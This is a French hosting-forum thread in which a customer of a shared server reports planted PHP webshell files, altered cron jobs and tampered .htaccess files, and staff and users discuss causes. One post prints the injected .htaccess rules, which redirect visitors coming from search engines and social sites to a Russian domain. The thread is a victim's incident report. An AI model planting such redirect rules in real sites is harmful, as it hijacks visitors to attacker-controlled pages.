Attaques sur serveur Requin

#1
Bonjour à vous,

Voilà j'ai constaté que des fichiers avaient été ajoutés à la racine de mon site et de chaque domaine compagnon.
Rien concernant les sous-domaines.

Je ne peux pas consulter ces fichiers, mon anti-virus m'en empêche, mais je vous les joins à ce post si quelqu'un veut les consulter.
Voir la pièce jointe w10146806n.php.zip

J'ai fait une analyse avec l'anti-virus du cPanel mais voilà le résultat il n'a rien trouvé étrangement...

Je ne sais pas quel était le but de cette attaque car aucun de mes sites n'a été modifié.

Peut être que cela est lié aux attaques des sites sous Wordpress.
N'en ayant aucun est-ce peut être pour cela...

En tout cas pensez à vérifier vos comptes :(
 

Mamat

New Member
#2
Sécurité hébergement mutualisé

Bonjour,

j'ai envoyé un ticket à planethoster concernant la sécurité de nos sites dans le cadre d'un hébergement mutualisé. Je pense que vous pouvez également y contribuer alors ce post en est l'occasion =).

Voici le message que j'ai envoyé :

- - - - - - - - - - - -
- - - - - - - - - - - -
Bonjour,

j'ai actuellement un hébergement mutualisé avec plusieurs sites dessus.

Il y a quelques mois j'ai été victime d'une attaque ayant corrompue un de mes sites. Je me suis rendu compte que tous mes autres sites avaient été infectés par le même script.

Si un hacker trouve une faille sur un site comment se fait il qu'il puisse infecter les autres sites présents dans d'
autres dossiers sur le serveur ? (mes sites sont dans un dossier "domaines").

Que peut on faire pour empêcher la propagation d'une attaque sur ses autres sites tout en restant sur du
mutualisé ? C'est à dire que si un site est corrompu, le hacker ne puisse pas en profiter pour corrompre les autres sites...

Merci pour votre réponse, à bientôt.
- - - - - - - - - - - -
- - - - - - - - - - - -


Comme réponse on m'a suggéré d'acheter des plans revendeurs. Comme je n'ai pas compris le rapport ou en tous cas en quoi cela pouvait résoudre ou prévenir le problème cité dans mon premier message (ci-dessus) j'ai demandé plus de précisions.

Donc si comme moi vous vous sentez concerné par la sécurité de vos sites alors n'hésitez pas à poster vos astuces et conseils. Je tiendrais ce topic à jour avec l'aide de Planethoster =)

@+
 

PH-CTO

Administrator
Membre du personnel
#3
Bonjour,

Il ne semble pas y avoir de problème, est-ce que votre wordpress est entièrement à jour svp? Ses modules, plugins et templates également?

Bonne journée à vous,
 
#4
Bonjour Saber,

Comme expliqué je n'ai aucun site sous wordpress. Beaucoup sont faits main.

Je n'ai contasté aucune modifications sur aucun de mes sites.

Par contre le but de mon message était de sensibiliser....
Et peut etre que d'autres personnes ont constate la meme chose....
 

Mamat

New Member
#6
merci je viens de consulter ton post ça correspond aux types de problèmes que l'on pourrait soulever ici et face auquel j'ai déjà été confronté.

Je n'ai pas pu ouvrir le fichier mon antivirus s'est affolé également. Et une rapide recherche sur google n'a rien donné.

J'attend encore des solutions de la part de planethoster concernant mon ticket et je les posterai ici. Si tu as des news avec ces fichiers n'hésite pas à en faire part ^^ Merci d'avoir alerté en tous cas.

@+
 

F0rum

New Member
#7
Bonjour,

J'ai envoyé le fichier chez avira antivirus pour analyse, voici la réponse :


We received the following archive files:

File ID Filename Size (Byte) Result
26746747 4f7afc316e3c0.zip 18.53 KB OK

A listing of files contained inside archives alongside their results can be found below:
File ID Filename Size (Byte) Result
26746748 w10146806n.php 22.74 KB MALWARE
26746748 w23336765n.php 22.74 KB MALWARE
26746748 w37883937n.php 22.74 KB MALWARE
26746748 w71971345n.php 22.74 KB MALWARE
26746748 w75162270n.php 22.74 KB MALWARE

Please find a detailed report concerning each individual sample below:
Filename Result
w10146806n.php MALWARE

The file 'w10146806n.php' has been determined to be 'MALWARE'. Our analysts named the threat PHP/WebShell.A.1. The term "PHP/" denotes a PHP scriptvirus. Detection is added to our virus definition file (VDF) starting with version 7.11.19.160.


Idem pour les 4 autres fichiers de l'archive.

Tu trouveras pas mal de choses intéressantes sur le web en recherchant PHP/WebShell.A.1, apparemment tu dois avoir ou tu as eu une faille au niveau sécurité sur ton site.

Cordialement.
 

PH-CTO

Administrator
Membre du personnel
#8
Bonjour à tous,

J'ai personnellement jeter un oeil sur le serveur Requin est il ne semble pas y avoir de problème. Si c'était généralisé, tous les sites auraient le même problème.

Je vais garder un oeil sur cette machine, si je constate quelque chose, je vous tiens au courant sans faute.

Bonne journée à tous,
 
#9
Merci bien pour ces infos.

Mais j'avoue ne pas comprendre car cette attaque est généralisée sur des sites de type "Wordpress" (aprés recherche sur google) or je n'ai aucun site sous wordpress...

Ce matin aucun fichier de présent, si ce n'est 1 seul mais dans le root de mon compte principal (inaccessible mis à part via FTP en toute logique)....

Savez-vous si il existe des sites où je peux faire un test sécurité de me sites?
 

PH-CTO

Administrator
Membre du personnel
#10
Merci bien pour ces infos.

Mais j'avoue ne pas comprendre car cette attaque est généralisée sur des sites de type "Wordpress" (aprés recherche sur google) or je n'ai aucun site sous wordpress...

Ce matin aucun fichier de présent, si ce n'est 1 seul mais dans le root de mon compte principal (inaccessible mis à part via FTP en toute logique)....

Savez-vous si il existe des sites où je peux faire un test sécurité de me sites?
Bonjour David,

Utilisez-vous un quelconque CMS? Joomla également peut être visé par ce genre d'attaques.

Bonne journée à vous,
 
#11
Bonsoir Saber,

Sur les 11 sites il y a :
  • 1 joomla
  • 1 phpfox
  • 1 phpBB
  • 1 prestashop (en sous-domaine donc non touché)
  • 1 artillo
Le reste est codé main.

Sauf que tous ont été affecté et n'ont aucun rapport entre eux, mis à part le fait d'être hébergés au même endroit.
 

PH-CTO

Administrator
Membre du personnel
#12
Bonjour,

Merci pour votre retour, je vais garder un oeil sur votre compte ;)

Bonne journée à vous,
 
#13
Merci Saber!

Ce midi j'ai remarqué que tous mes fichiers ".htaccess" avaient été modifiés pour ajouter des redirections et les CHMOD étaient à 444....
J'ai tout rectifié mais je ne sais pas si depuis de nouvelles modifications ont été faites...
 
#15
Je viens de rentrer du taf et je viens de le faire ;)
J'ai désactivé l'accés en FTP anomyne aussi

Pensez-vous que je devrais changer les password de chaque compte compagnon et de chaque bases de données?? :(
 
#17
A nouveau de nouveaux fichiers sont apparus sur mon FTP, mes fichiers ".htaccess" ont été modifiés et mes taches CRON supprimées et remplacées par 1 tache appelant un fichier ajouté....

Je ne comprends absolument pas :(
 

Mamat

New Member
#18
Est il possible de voir les logs d'accès aux fichiers pour avoir plus de détails peut être ? Est il possible que l'un des sites (en dehors des tiens) présent sur le serveur soit infecté et du coup offre une brèche vers tes propres sites ?
 

PH-CTO

Administrator
Membre du personnel
#19
Bonjour,

Merci pour votre retour,

Vous pouvez avoir accès aux logs depuis le cPanel. Néanmoins, chaque compte est bien séparé et la technologie utilisée ne permet pas qu'un compte "infecté" infecte d'autres comptes.

Bonne journée à vous,
 
#20
je finis de nettoyer tous mes fichiers et je regarde les logs car tous les jours je peux vérifier....

j'ai même l'impression que toutes les heures mes fichiers "htaccess" sont modifiés...
 
#21
Vous pouvez avoir accès aux logs depuis le cPanel. Néanmoins, chaque compte est bien séparé et la technologie utilisée ne permet pas qu'un compte "infecté" infecte d'autres comptes.
Où puis-je trouver ces logs précisément?

Ce qui est étrange c'est que je retrouve des fichiers "infectés" de type wordpress mais je n'ai aucun site sous wordpress....
 
#22
voilà ce qui est ajouté dans mes fichiers "htaccess"
Code:
<IfModule mod_rewrite.c>
		
RewriteEngine On		

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)

RewriteRule ^(.*)$ [url=http://kas-baa.ru/space?7]Google[/url] [R=301,L]

RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)

RewriteRule ^(.*)$ [url=http://kas-baa.ru/space?7]Google[/url] [R=301,L]

</IfModule>
Quelqu'un a-t-il déjà vu cela??

Et puis pourquoi le scanner du cPanel ne trouve rien alors qu'un analyse avec un anti-virus gratuit me trouve les fichiers infectés modifiés?
 
#23
Salut David77,

J'arrive sur PH et je trouve cela inquiétant, sur ton site joomla attaqué as tu une protection du genre admintool ?
 
#24
Bonjour,

Depuis ces attaques, sans rien faire à part traquer les fichiers ajoutés et modifiés, je n'ai plus de problème...
Impossible de dire si cela venait de 1 de mes sites ou pas
 
Haut